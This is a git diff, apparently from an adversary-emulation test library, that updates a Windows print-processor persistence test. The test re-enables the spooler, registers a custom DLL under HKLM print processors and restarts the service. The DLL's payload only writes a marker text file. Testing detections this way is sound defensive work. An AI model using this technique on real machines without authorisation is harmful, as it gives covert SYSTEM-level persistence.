Merge branch 'master' into master

atomics/T1547.012/T1547.012.yaml

@@ -18,19 +18,19 @@ atomic_tests:
       default: 0
   executor:
     command: |
+      if( $(get-service -Name spooler).StartType -eq "Disabled") {Set-Service -Name "spooler" -StartupType Automatic}
       net stop spooler
-      Copy-Item $PathToAtomicsFolder\T1547.012\bin\PrintProcessor.dll C:\Windows\System32\spool\prtprocs\x64\PrintProcessor.dll
-      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "PrintProcessor.dll" /t REG_SZ /f
-      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /f >nul 2>&1
+      Copy-Item $PathToAtomicsFolder\T1547.012\bin\AtomicTest.dll C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /v "Driver" /d "AtomicTest.dll" /t REG_SZ /f
       net start spooler
       if(#{restart}){
         Restart-Computer
       }
     cleanup_command: |
       net stop spooler
-      rm -force C:\Windows\System32\spool\prtprocs\x64\PrintProcessor.dll
-      rm -force C:\Users\Public\AtomicRedTeam.txt
-      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" /f >nul 2>&1
+      rm -force C:\Windows\System32\spool\prtprocs\x64\AtomicTest.dll -ErrorAction SilentlyContinue
+      rm -force C:\Users\Public\AtomicTest.txt -ErrorAction SilentlyContinue
+      remove-item "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\AtomicRedTeam" -Force -ErrorAction SilentlyContinue
       net start spooler
     name: powershell
     elevation_required: true

atomics/T1547.012/src/AtomicTest.c

@@ -1,23 +1,33 @@
-#include "pch.h"
 #include <windows.h>
 #include <stdio.h>
-#include <fstream> 
 
 #define DllExport __declspec(dllexport)
 
-extern "C" __declspec(dllexport) void PayloadFunction()
+__declspec(dllexport) void PayloadFunction()
 {
-    std::ofstream outfile("C:\\Users\\Public\\AtomicTest.txt");
-    outfile << "AtomicRedTeam test for T1547.012" << std::endl;
-    outfile.close();
+    HANDLE hFile;
+    hFile = CreateFile("C:\\Users\\Public\\AtomicTest.txt", 
+                        GENERIC_WRITE, 
+                        0,
+                        NULL,
+                        CREATE_ALWAYS,
+                        FILE_ATTRIBUTE_NORMAL,
+                        NULL);
+
+   if (hFile == INVALID_HANDLE_VALUE) 
+    { 
+        printf("Unable to create file\n");
+        return -1;
+    }
+
 }
 
-extern "C" DllExport BOOL ClosePrintProcessor(HANDLE hPrintProcessor)
+BOOL ClosePrintProcessor(HANDLE hPrintProcessor)
 {
     return 1;
 }
 
-extern "C" DllExport BOOL ControlPrintProcessor(HANDLE hPrintProcessor, DWORD Command)
+BOOL ControlPrintProcessor(HANDLE hPrintProcessor, DWORD Command)
 {
     return 1;
 }
@@ -25,10 +35,11 @@ extern "C" DllExport BOOL ControlPrintProcessor(HANDLE hPrintProcessor, DWORD Co
 BOOL EnumPrintProcessorDatatypesW(LPWSTR pName, LPWSTR pPrintProcessorName, DWORD Level, LPBYTE pDatatypes, DWORD cbBuf, LPDWORD pcbNeeded, LPDWORD pcReturned)
 {
     // executes when DLL is loaded
+    PayloadFunction();
     return 1;
 }
 
-extern "C" DllExport DWORD GetPrintProcessorCapabilities(LPTSTR pValueName, DWORD dwAttributes, LPBYTE pData, DWORD nSize, LPDWORD pcbNeeded)
+DWORD GetPrintProcessorCapabilities(LPTSTR pValueName, DWORD dwAttributes, LPBYTE pData, DWORD nSize, LPDWORD pcbNeeded)
 {
     return 0;
 }
@@ -43,12 +54,12 @@ typedef struct _PRINTPROCESSOROPENDATA {
     LPWSTR   pPrinterName;
 } PRINTPROCESSOROPENDATA, * PPRINTPROCESSOROPENDATA, * LPPRINTPROCESSOROPENDATA;
 
-extern "C" DllExport HANDLE OpenPrintProcessor(LPWSTR pPrinterName, PPRINTPROCESSOROPENDATA pPrintProcessorOpenData)
+HANDLE OpenPrintProcessor(LPWSTR pPrinterName, PPRINTPROCESSOROPENDATA pPrintProcessorOpenData)
 {
     return (HANDLE)11;
 }
 
-extern "C" DllExport BOOL PrintDocumentOnPrintProcessor(HANDLE hPrintProcessor, LPWSTR pDocumentName)
+BOOL PrintDocumentOnPrintProcessor(HANDLE hPrintProcessor, LPWSTR pDocumentName)
 {
     return 1;
 }
@@ -58,10 +69,11 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
     switch (fdwReason)
     {
     case DLL_PROCESS_ATTACH:
-        PayloadFunction();
         break;
     case DLL_THREAD_ATTACH:
+        break;
     case DLL_PROCESS_DETACH:
+        break;
     case DLL_THREAD_DETACH:
         break;
     }

atomics/T1547.012/src/AtomicTest.def

@@ -0,0 +1,7 @@
+EXPORTS
+  ClosePrintProcessor
+  ControlPrintProcessor
+  EnumPrintProcessorDatatypesW
+  GetPrintProcessorCapabilities
+  OpenPrintProcessor
+  PrintDocumentOnPrintProcessor

atomics/T1547.012/src/build.bat

@@ -0,0 +1 @@
+cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll